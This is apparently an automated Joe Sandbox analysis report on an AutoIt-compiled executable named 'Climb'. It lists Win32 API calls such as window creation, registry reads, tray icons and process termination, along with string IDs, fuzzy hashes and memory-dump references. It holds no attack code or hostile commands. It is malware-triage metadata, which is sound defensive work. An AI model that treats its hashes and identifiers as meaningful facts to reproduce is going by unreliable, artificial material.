                                                                                                                                                                          • Instruction ID: c7f1dcd4aa34b22d9edbb263f9f0773372b245dedb803a8efd7f4065f3295bbc
                                                                                                                                                                          • Opcode Fuzzy Hash: d50e894d0ed5f1cacf5506d34cb221a473221971bdd18aa164492682193a0137
                                                                                                                                                                          • Instruction Fuzzy Hash: E86246B0508345CFC724DF28C594AAABBE5BF88304F108A6EE5998B352DB71D945CF92

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1023 a635b3-a63623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A635E1
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A63602
                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A63368,?), ref: 00A63616
                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A63368,?), ref: 00A6361F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$CreateShow
                                                                                                                                                                          • String ID: AutoIt v3$edit
                                                                                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                                                                                          • Opcode ID: 6df12ca2fa51ef837ea6288aa3cc9c99e42f69101cd11cdf8264c6f8a3e4187b
                                                                                                                                                                          • Instruction ID: e186f44cb85d88a02ae22f8401ce65a3143d2f6a8df5c2854fb436a0ca8c1d13
                                                                                                                                                                          • Opcode Fuzzy Hash: 6df12ca2fa51ef837ea6288aa3cc9c99e42f69101cd11cdf8264c6f8a3e4187b
                                                                                                                                                                          • Instruction Fuzzy Hash: 62F0F4715402947EE73157577C08F3B3EBED7C7F50F20041DBA0497160DA651855DA78

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AA5287
                                                                                                                                                                            • Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A
                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A66299
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                          • String ID: Line %d: $AutoIt -
                                                                                                                                                                          • API String ID: 2289894680-4094128768
                                                                                                                                                                          • Opcode ID: 5643d3fca49ea5c35a44ad54d4935ce19ca32e992c64bd383144fd2313ddff46
                                                                                                                                                                          • Instruction ID: 63fe30476c3628b5cea9335ba499971ce3c36b7ea0c53b72820fd4f67ff016e6
                                                                                                                                                                          • Opcode Fuzzy Hash: 5643d3fca49ea5c35a44ad54d4935ce19ca32e992c64bd383144fd2313ddff46
                                                                                                                                                                          • Instruction Fuzzy Hash: AF41AE71808304AEC311EB60ED55AEF7BECAF54724F10462EF599930A1EF349649C796

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1075 a658cb-a658d6 1076 a65948-a6594a 1075->1076 1077 a658d8-a658dd 1075->1077 1079 a6593b-a6593e 1076->1079 1077->1076 1078 a658df-a658f7 RegOpenKeyExW 1077->1078 1078->1076 1080 a658f9-a65918 RegQueryValueExW 1078->1080 1081 a6592f-a6593a RegCloseKey 1080->1081 1082 a6591a-a65925 1080->1082 1081->1079 1083 a65927-a65929 1082->1083 1084 a6593f-a65946 1082->1084 1085 a6592d 1083->1085 1084->1085 1085->1081
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A658BE,SwapMouseButtons,00000004,?), ref: 00A658EF
                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A658BE,SwapMouseButtons,00000004,?), ref: 00A65910
                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00A658BE,SwapMouseButtons,00000004,?), ref: 00A65932
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID: Control Panel\Mouse
                                                                                                                                                                          • API String ID: 3677997916-824357125
                                                                                                                                                                          • Opcode ID: e786c673eaf5ede7eb32e70c1adc6f69f4a215b4536d87af3126a4ad98321537
                                                                                                                                                                          • Instruction ID: 7dfb670cc124e76e7e4144f20629984563c95d96f5d7a31164c359ce9dcd2c30
                                                                                                                                                                          • Opcode Fuzzy Hash: e786c673eaf5ede7eb32e70c1adc6f69f4a215b4536d87af3126a4ad98321537
                                                                                                                                                                          • Instruction Fuzzy Hash: EA117C76910618FFDB21CFA4CC80DAE77B9EF00764F104419F802E7210E6319E41D7A0
                                                                                                                                                                          Strings
                                                                                                                                                                          • Variable must be of type 'Object'., xrefs: 00AB48C6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Variable must be of type 'Object'.
                                                                                                                                                                          • API String ID: 0-109567571
                                                                                                                                                                          • Opcode ID: 6e201237dd4b00ab84d77a5d0a7b5e445813830455a0ff64c8c8e44f0b0d564c
                                                                                                                                                                          • Instruction ID: ee8f01b370c991bc75c80a0ea3e6fd18280d8e34a7ab7dcff353a074418cf61d
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e201237dd4b00ab84d77a5d0a7b5e445813830455a0ff64c8c8e44f0b0d564c
                                                                                                                                                                          • Instruction Fuzzy Hash: C3C28A75E00205DFCB24DFA8D980BAEB7F1BF19710F248169E909AB392D775AD41CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00A715F2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1385522511-0
                                                                                                                                                                          • Opcode ID: 1c678708578b10cfe26ec67580e23613ad3c8a2d07fda31358dbf7ce8955ce6a
                                                                                                                                                                          • Instruction ID: 70bbde9da5109325a85fd46c4d5d176f43311969533ebdf5d9cd062f307fd393
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c678708578b10cfe26ec67580e23613ad3c8a2d07fda31358dbf7ce8955ce6a
                                                                                                                                                                          • Instruction Fuzzy Hash: 45B26875A08340CFDB24CF28C890A2AB7F1BB99710F24C95DE9898B352D775ED45CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A809D8
                                                                                                                                                                            • Part of subcall function 00A83614: RaiseException.KERNEL32(?,?,?,00A809FA,?,00000000,?,?,?,?,?,?,00A809FA,00000000,00B29758,00000000), ref: 00A83674
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A809F5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                          • API String ID: 3476068407-410509341
                                                                                                                                                                          • Opcode ID: 44f2913243fa824ad02c13c9c46e7135110b8997dd305c8d90c1e54df07b550a
                                                                                                                                                                          • Instruction ID: b795e06b873b61f4a6910b4b162185536392121af5572e73f67fda16b5534908
                                                                                                                                                                          • Opcode Fuzzy Hash: 44f2913243fa824ad02c13c9c46e7135110b8997dd305c8d90c1e54df07b550a
                                                                                                                                                                          • Instruction Fuzzy Hash: 71F0A43490020CB6CB40BBA8ED46D9E776C5E01750B504270F928965A2FB70EA1D8790
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00AE8D52
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00AE8D59
                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 00AE8F3A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 146820519-0
                                                                                                                                                                          • Opcode ID: 038017dcc879978d326b2c0b4f9349691601f4773467cd92a88f9d24b51740ae
                                                                                                                                                                          • Instruction ID: 63438900790893a9a2f0627d3f022c66d3ce35ab7d82046255d6d77f5a042b82
                                                                                                                                                                          • Opcode Fuzzy Hash: 038017dcc879978d326b2c0b4f9349691601f4773467cd92a88f9d24b51740ae
                                                                                                                                                                          • Instruction Fuzzy Hash: 72128A71A083409FC710DF29C584B2ABBE5FF89318F14895DE8898B392DB35ED45CB92
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A632AF
                                                                                                                                                                            • Part of subcall function 00A6327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A632B7
                                                                                                                                                                            • Part of subcall function 00A6327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A632C2
                                                                                                                                                                            • Part of subcall function 00A6327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A632CD
                                                                                                                                                                            • Part of subcall function 00A6327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A632D5
                                                                                                                                                                            • Part of subcall function 00A6327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A632DD
                                                                                                                                                                            • Part of subcall function 00A63205: RegisterWindowMessageW.USER32(00000004,?,00A62964), ref: 00A6325D
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A62A0A
                                                                                                                                                                          • OleInitialize.OLE32 ref: 00A62A28
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000), ref: 00AA3A0D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1986988660-0
                                                                                                                                                                          • Opcode ID: 6bfbc41ba3eb549dad97e5151a127dcff6d217887c610ed43115217cdcc6e8a1
                                                                                                                                                                          • Instruction ID: 97c381eeffe1e58589fe8ff3bc72c4a03450a35543aed25d0723e13a40578086
                                                                                                                                                                          • Opcode Fuzzy Hash: 6bfbc41ba3eb549dad97e5151a127dcff6d217887c610ed43115217cdcc6e8a1
                                                                                                                                                                          • Instruction Fuzzy Hash: DA71ABB59112009FC789EFB9BE6A61D3AF1BB68300732826AE609C7371EF704645CF54
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A661A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A66299
                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00A7FD36
                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A7FD45
                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00ABFE33
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3500052701-0
                                                                                                                                                                          • Opcode ID: 9e51837c422f2be5a90ef84046c6e37504f23af7d9b5cde21e046fb788ac01d4
                                                                                                                                                                          • Instruction ID: a7ff28e001621827dc9c92653311b1f8a593583d74effd08ba255b0ec585900d
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e51837c422f2be5a90ef84046c6e37504f23af7d9b5cde21e046fb788ac01d4
                                                                                                                                                                          • Instruction Fuzzy Hash: 28318171904344AFEB32CF648C95BEABBFCAB02308F1444AED69A97242D7745A85CB51
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,00A9894C,?,00B29CE8,0000000C), ref: 00A98A84
                                                                                                                                                                          • GetLastError.KERNEL32(?,00A9894C,?,00B29CE8,0000000C), ref: 00A98A8E
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00A98AB9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2583163307-0
                                                                                                                                                                          • Opcode ID: f8c90a7bb91b0811c81271e8383632290846913beca8b1727ab75a1b8781f147
                                                                                                                                                                          • Instruction ID: ec4eafb2dfaff1a017ce7a5d312633a23ff1eb07cfbc97abd8729108dd568cbe
                                                                                                                                                                          • Opcode Fuzzy Hash: f8c90a7bb91b0811c81271e8383632290846913beca8b1727ab75a1b8781f147
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D012B32B051606ACE2563B8BD46B7E67C94B837B4F2B061AF9149B5D2EF388D815290
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00A997BA,FF8BC369,00000000,00000002,00000000), ref: 00A99744
                                                                                                                                                                          • GetLastError.KERNEL32(?,00A997BA,FF8BC369,00000000,00000002,00000000,?,00A95ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00A86F41), ref: 00A9974E
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00A99755
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2336955059-0
                                                                                                                                                                          • Opcode ID: bb3bd4208b4607bb385b92fbdc057ed894a7e348fbf62a8e296f64ba7d0ee1c1
                                                                                                                                                                          • Instruction ID: dd954a9f651f0a1e443d7f19c305fa4001747782408f201601af0a747b33ca9c
                                                                                                                                                                          • Opcode Fuzzy Hash: bb3bd4208b4607bb385b92fbdc057ed894a7e348fbf62a8e296f64ba7d0ee1c1
                                                                                                                                                                          • Instruction Fuzzy Hash: C301F532720115BB8F059FEDEC0686F3B6AEB85320B240319F8119B190EE309D419BA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00A6F27B
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00A6F289
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A6F29F
                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00A6F2B1
                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00AB32D8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3288985973-0
                                                                                                                                                                          • Opcode ID: 952583fec20d1d924b5888805cb9e636184060adf71d18344444df0c60597e3e
                                                                                                                                                                          • Instruction ID: 5831821ac96c6633a33e21982c7977d3e7749fd8ff4eba6031b248f4197793c8
                                                                                                                                                                          • Opcode Fuzzy Hash: 952583fec20d1d924b5888805cb9e636184060adf71d18344444df0c60597e3e
                                                                                                                                                                          • Instruction Fuzzy Hash: 23F05E312043449BEB34DBF4DC89FEA73ADAB44300F108929E209970C0DB309588CB25
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00A73006
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                          • String ID: CALL
                                                                                                                                                                          • API String ID: 1385522511-4196123274
                                                                                                                                                                          • Opcode ID: 08f102f8334d37a65bc79ef6b7d7ba3ceea1c12cf7985922f31471db35fc32a4
                                                                                                                                                                          • Instruction ID: 10723c22266a8da66f9e194e1a6824781c0aea03e8ac09f6c3b0cdc523a298ea
                                                                                                                                                                          • Opcode Fuzzy Hash: 08f102f8334d37a65bc79ef6b7d7ba3ceea1c12cf7985922f31471db35fc32a4
                                                                                                                                                                          • Instruction Fuzzy Hash: CF2288706082419FD724DF24C884B2ABBF5BF98314F24C95DF49A8B3A2D771E945CB92
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
